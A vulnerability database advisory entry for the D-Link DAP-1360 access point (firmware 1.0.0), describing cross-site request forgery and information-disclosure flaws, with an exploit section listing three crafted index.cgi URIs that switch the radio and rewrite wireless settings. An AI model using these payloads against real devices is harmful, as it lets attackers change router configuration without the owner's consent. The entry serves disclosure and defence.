ID
VAR-E-201411-0374
TITLE
D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
Trust: 0.3
DESCRIPTION
D-Link DAP-1360 is prone to multiple cross-site request-forgery vulnerabilities and an information-disclosure vulnerability.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, gaining unauthorized access to the affected device and obtaining sensitive information; other attacks are also possible.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | d link | model: | dap-1360 | scope: | eq | version: | 1.0.0 | Trust: 0.3 |
EXPLOIT
Attackers can use a browser to exploit these issues. To exploit the cross-site request-forgery issue, an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URI is available:
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Design Error
Trust: 0.3
CREDITS
MustLive
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 71000 | Trust: 0.3 |
REFERENCES
| url: | http://www.dlink.com/ | Trust: 0.3 |
| url: | http://seclists.org/fulldisclosure/2014/nov/19 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 71000 |
LAST UPDATE DATE
2022-07-27T09:27:24.301000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 71000 | date: | 2014-11-08T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 71000 | date: | 2014-11-08T00:00:00 |